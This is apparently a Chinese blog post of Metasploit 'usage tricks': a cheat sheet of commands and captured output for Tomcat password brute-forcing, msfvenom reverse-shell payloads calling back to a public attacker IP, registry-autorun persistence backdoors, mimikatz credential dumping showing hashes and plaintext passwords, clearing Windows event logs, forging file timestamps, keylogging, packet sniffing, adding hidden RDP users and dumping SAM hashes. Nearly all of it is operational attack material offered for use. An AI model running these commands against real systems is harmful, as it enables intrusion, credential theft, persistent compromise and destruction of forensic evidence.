metasploit framework的一些使用姿势(持续更新)

前言

记录一些metasploit framework的使用姿势

一、MSF

1、关于tomcat口令暴力猜解模块

use auxiliary/scanner/http/tomcat_mgr_login show options set rhosts 192.168.2.147 set RPORT 8080 run 

注意:tomcat默认每个账号登陆5次失败后,账户就会被锁定

2、建立windows反弹shell

1.生成windows反弹shell  msfvenom -p windows/meterpreter/reverse_tcp LHOST=2x.94.50.153 LPORT=4433 -f exe -o 4433.exe //LHOST为公网IP //LPORT为反弹端口 //4433.exe为生成文件   2.获取监听IP与端口  msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set LHOST 2xx.94.50.153 msf5 exploit(multi/handler) > set LPORT 4433 msf5 exploit(multi/handler) > run  3.反弹成功  meterpreter > sysinfo Computer        : WIN-UKKED2CCSHJ OS              : Windows 2012 R2 (6.3 Build 9600). Architecture    : x64 System Language : zh_CN Domain          : WORKGROUP Logged On Users : 3 Meterpreter     : x86/windows  meterpreter > getuid Server username: IIS APPPOOLpadt002 

3、msf建立linux反弹shell#

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=2x.94.50.153 LPORT=4433 -f elf > payload.elf //LHOST为公网IP //LPORT为反弹端口 //4433.exe为生成文件 

4、msf建立persistence持久化

Meterpreter的persistence脚本允许注入Meterpreter代理,以确保系统重启之后Meterpreter还能运行。

  • 如果是反弹连接方式,可以设置连接攻击机的时间间隔
  • 如果是绑定方式,可以设置在指定时间绑定开放端口。

我们运行persistence脚本让系统开机自启动,启动命令为

meterpreter > run persistence -h Meterpreter Script for creating a persistent backdoor on a target host.  OPTIONS:      -A        Automatically start a matching exploit/multi/handler to connect to the agent     -L <opt>  Location in target host to write payload to, if none %TEMP% will be used.     -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.     -S        Automatically start the agent on boot as a service (with SYSTEM privileges)     -T <opt>  Alternate executable template to use     -U        Automatically start the agent when the User logs on     -X        Automatically start the agent when the system boots     -h        This help menu     -i <opt>  The interval in seconds between each connection attempt     -p <opt>  The port on which the system running Metasploit is listening     -r <opt>  The IP of the system running Metasploit listening for the connect back  meterpreter > run persistence -X -i 10 -p 6666 -r 192.168.71.105 //Meterpreter(-X),10秒(-i 10) 重连一次,使用端口为6666(-p 6666),连接的目的IP为 192.168.71.105 [*] Running Persistance Script [*] Resource file for cleanup created at /root/.msf4/logs/persistence/WUST-3E75F1D708_20160106.3022/WUST-3E75F1D708_20160106.3022.rc [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.71.105 LPORT=6666 [*] Persistent agent script is 148426 bytes long [+] Persistent Script written to C:DOCUME~1ADMINI~1LOCALS~1TempSIjvSmRq.vbs [*] Starting connection handler at port 6666 for windows/meterpreter/reverse_tcp [+] exploit/multi/handler started! [*] Executing script C:DOCUME~1ADMINI~1LOCALS~1TempSIjvSmRq.vbs [+] Agent executed with PID 1308 [*] Installing into autorun as HKCUSoftwareMicrosoftWindowsCurrentVersionRunDNXmKhNlKXyA [+] Installed into autorun as HKCUSoftwareMicrosoftWindowsCurrentVersionRunDNXmKhNlKXyA meterpreter >  [*] Sending stage (885806 bytes) to 192.168.71.112 [*] Meterpreter session 2 opened (192.168.71.105:6666 -> 192.168.71.112:1086) at 2016-01-06 20:30:26 +0800  meterpreter > exit [*] Shutting down Meterpreter...  [*] 192.168.71.112 - Meterpreter session 1 closed.  Reason: User exit msf exploit(handler) > sessions -i  Active sessions ===============    Id  Type                   Information                                      Connection   --  ----                   -----------                                      ----------   2   meterpreter x86/win32  WUST-3E75F1D708Administrator @ WUST-3E75F1D708  192.168.71.105:6666 -> 192.168.71.112:1086 (192.168.71.112)  msf exploit(handler) > sessions -i 2 [*] Starting interaction with 2...  meterpreter >  自动化的脚本在C:Documents and SettingsAdministratorLocal SettingsTemp下 自动化以后下次可以直接在msf下打开会话: msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.71.105 lhost => 192.168.71.105 msf exploit(handler) > set lport 6666 lport => 6666 msf exploit(handler) > run  [*] Sending stage (885806 bytes) to 192.168.71.112 [*] Meterpreter session 3 opened (192.168.71.105:6666 -> 192.168.71.112:1098) at 2016-01-06 21:05:58 +0800 

二、mimikatz

1、获取密码方法1

meterpreter > getuid Server username: NT AUTHORITYSYSTEM meterpreter > load mimikatz  Loading extension mimikatz...Success. meterpreter > msv  [+] Running as SYSTEM  [*] Retrieving msv credentials  msv credentials  ===============  AuthID    Package    Domain        User           Password  ------    -------    ------        ----           --------  0;334101  NTLM       chenglee-PC   chenglee       lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }  0;334068  NTLM       chenglee-PC   chenglee       lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }  0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  n.s. (Credentials KO)  0;996     Negotiate  WORKGROUP     CHENGLEE-PC$   n.s. (Credentials KO)  0;49101   NTLM                                    n.s. (Credentials KO)  0;999     NTLM       WORKGROUP     CHENGLEE-PC$   n.s. (Credentials KO) meterpreter > kerberos  [+] Running as SYSTEM  [*] Retrieving kerberos credentials  kerberos credentials  ====================  AuthID    Package    Domain        User           Password  ------    -------    ------        ----           --------  0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE   0;996     Negotiate  WORKGROUP     CHENGLEE-PC$    0;49101   NTLM                                     0;999     NTLM       WORKGROUP     CHENGLEE-PC$    0;334101  NTLM       chenglee-PC   chenglee       lizhenghua  0;334068  NTLM       chenglee-PC   chenglee       lizhenghua 

2、获取密码方法2

meterpreter > mimikatz_command -f samdump::hashes  Ordinateur : chenglee-PC  BootKey    : 0648ced51b6060bed1a3654e0ee0fd93  Rid  : 500  User : Administrator  LM   :  NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0  Rid  : 501  User : Guest  LM   :  NTLM :  Rid  : 1000  User : chenglee  LM   :  NTLM : 8d0f8e1a18236379538411a9056799f5 meterpreter > mimikatz_command -f sekurlsa::searchPasswords  [0] { chenglee ; chenglee-PC ; lizhenghua }  [1] { chenglee ; chenglee-PC ; lizhenghua }  [2] { chenglee ; chenglee-PC ; lizhenghua }  [3] { chenglee ; chenglee-PC ; lizhenghua }  [4] { chenglee-PC ; chenglee ; lizhenghua }  [5] { chenglee-PC ; chenglee ; lizhenghua }  meterpreter >  meterpreter > mimikatz_command -f sekurlsa::searchPasswords  [0] { Administrator ; CLOUDVM ; 1244567 }  [1] { Administrator ; CLOUDVM ; 1244567 } 

3、wdigest

meterpreter > wdigest  [+] Running as SYSTEM  [*] Retrieving wdigest credentials  wdigest credentials  ===================  AuthID    Package    Domain        User           Password  ------    -------    ------        ----           --------  0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE   0;996     Negotiate  WORKGROUP     CHENGLEE-PC$    0;49101   NTLM                                     0;999     NTLM       WORKGROUP     CHENGLEE-PC$    0;334101  NTLM       chenglee-PC   chenglee       lizhenghua  0;334068  NTLM       chenglee-PC   chenglee       lizhenghua 

4、tspkg

meterpreter > tspkg  [+] Running as SYSTEM  [*] Retrieving tspkg credentials  tspkg credentials  =================  AuthID    Package    Domain        User           Password  ------    -------    ------        ----           --------  0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE   0;996     Negotiate  WORKGROUP     CHENGLEE-PC$    0;49101   NTLM                                     0;999     NTLM       WORKGROUP     CHENGLEE-PC$    0;334101  NTLM       chenglee-PC   chenglee       lizhenghua  0;334068  NTLM       chenglee-PC   chenglee       lizhenghua 

三、meterpreter基本命令#

1、系统命令

基本系统命令

sessions //sessions –h 查看帮助 sessions -l //列出当前会话 sessions -i <ID值> //进入会话 sessions -k //杀死会话 background //将当前会话放置后台 run //执行已有的模块,输入run后按两下tab,列出已有的脚本 info //查看已有模块信息 getuid //查看权限  getpid //获取当前进程的pid sysinfo //查看目标机系统信息 ps //查看当前活跃进程 kill <PID值> //杀死进程 idletime //查看目标机闲置时间 reboot shutdown //重启/关机 shell //进入目标机cmd shell 

execute执行文件

execute //在目标机中执行文件 execute -H -i -f cmd.exe //创建新进程cmd.exe,-H不可见,-i交互 

clearev清除日志

clearev  #清除windows中的应用程序日志、系统日志、安全日志 

2、文件系统命令

基本文件系统命令

getwd pwd //查看当前工作目录   ls //列出当前目录 cd //跳转目录 search -f *pass* //搜索文件  -h查看帮助 cat c:\lltest\lltestpasswd.txt //查看文件内容 upload /tmp/hack.txt C:\lltest //上传文件到目标机上 download c:\lltest\lltestpasswd.txt /tmp/ //下载文件到本机上 edit c:\1.txt //编辑或创建文件,没有的话,会新建文件 rm C:\lltest\hack.txt //删除文件 mkdir lltest2 //只能在当前目录下创建文件夹 rmdir lltest2 //只能删除当前目录下文件夹 getlwd lpwd //操作攻击者主机 查看当前目录 lcd /tmp //操作攻击者主机 切换目录 

timestomp伪造时间戳

timestomp C:// -h    //查看帮助 timestomp -v C://2.txt    //查看时间戳 timestomp C://2.txt -f C://1.txt  //将1.txt的时间戳复制给2.txt 

3、网络命令

基本网络命令

ipconfig/ifconfig netstat –ano arp getproxy  //查看代理信息 route    //查看路由 

portfwd端口转发

portfwd add -l 6666 -p 3389 -r 127.0.0.1 //将目标机的3389端口转发到本地6666端口 

端口扫描

run post/windows/gather/arp_scanner RHOSTS=192.168.159.0/24 run auxiliary/scanner/portscan/tcp RHOSTS=192.168.159.144 PORTS=3389 

4、提权

getsystem 

getsystem工作原理:

  • getsystem创建一个新的Windows服务,设置为SYSTEM运行,当它启动时连接到一个命名管道。
  • getsystem产生一个进程,它创建一个命名管道并等待来自该服务的连接。
  • Windows服务已启动,导致与命名管道建立连接。
  • 该进程接收连接并调用ImpersonateNamedPipeClient,从而为SYSTEM用户创建模拟令牌。
  • 然后用新收集的SYSTEM模拟令牌产生cmd.exe,并且我们有一个SYSTEM特权进程。

5、远程桌面&截屏

enumdesktops //查看可用的桌面 getdesktop //获取当前meterpreter 关联的桌面 set_desktop //设置meterpreter关联的桌面  -h查看帮助 screenshot //截屏 use espia //或者使用espia模块截屏  然后输入screengrab run vnc //使用vnc远程桌面连接 

getgui命令

run getgui –h //查看帮助 run getgui -e //开启远程桌面 run getgui -u lltest2 -p 123456 //添加用户 run getgui -f 6661 –e //389端口转发到6661 

getgui 系统不推荐,推荐使用run post/windows/manage/enable_rdp
getgui添加用户时,有时虽然可以成功添加用户,但是没有权限通过远程桌面登陆

enable_rdp脚本

run post/windows/manage/enable_rdp //开启远程桌面 run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 //添加用户 run post/windows/manage/enable_rdp FORWARD=true LPORT=6662 //将3389端口转发到6662 

脚本位于/usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb
通过enable_rdp.rb脚本可知:开启rdp是通过reg修改注册表;添加用户是调用cmd.exe 通过net user添加;端口转发是利用的portfwd命令

6、键盘记录

keyscan_start //开始键盘记录 keyscan_dump //导出记录数据 keyscan_stop //结束键盘记录 

7、sniffer抓包

use sniffer sniffer_interfaces //查看网卡 sniffer_start 2 //选择网卡 开始抓包 sniffer_stats 2 //查看状态 sniffer_dump 2 /tmp/lltest.pcap //导出pcap数据包 sniffer_stop 2 //停止抓包 

8、哈希利用-获取哈希

run post/windows/gather/smart_hashdump //从SAM导出密码哈希,需要SYSTEM权限 

结语

记录了一些MSF的使用姿势

版权声明:玥玥 发表于 2021-05-16 22:13:12。
转载请注明:metasploit framework的一些使用姿势(持续更新) | 女黑客导航